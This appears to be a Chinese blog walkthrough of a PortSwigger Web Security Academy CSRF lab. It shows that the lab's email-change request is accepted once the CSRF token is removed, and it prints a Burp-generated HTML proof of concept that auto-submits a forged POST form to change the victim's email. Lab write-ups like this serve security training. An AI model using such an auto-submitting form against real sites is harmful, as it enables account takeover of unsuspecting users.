burpsuite靶场----CSRF----token验证取决于其是否存在

靶场地址

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-token-being-present

正式开始

1.登录

2.抓包,发现有token

3.删掉这个csrf参数,发现无影响

但是如果换成GET方式的话不行

4.制作poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a9f00b704d2d4e583bf6f080023008d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;abc&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

5.提交

本栏目推荐文章
• 【转载】淘宝爬虫sign、token详解
• go使用jwt创建token并验证token的有效性
• nuxt构建失败：if (codePoint 》= 0x3_00 && codePoint (= 0x3_6F) { SyntaxError: Invalid or unexpected token
• vue报错：Module parse failed: Unexpected token (5:2) You may need an appropriate loader to handle this file type.
• (token，Spring Security)
• vulnhub靶场渗透学习
• drf之基于自定义表签发token及基于自定义表编写认证类
• 记录--前端无感知刷新token & 超时自动退出
• NetCore 获取Token信息
• 云服务器利用Docker搭建sqli-labs靶场环境

靶场 取决于 burpsuite token CSRF靶场 取决于burpsuite token 靶场 取决于burpsuite方法 靶场burpsuite csrf csrf_token 靶场burpsuite目录 靶场dvwa csrf 靶场burpsuite信息sql 靶场burpsuite数据sql 靶场burpsuite信息 burpsuite_pro_v burpsuite 2023.9 token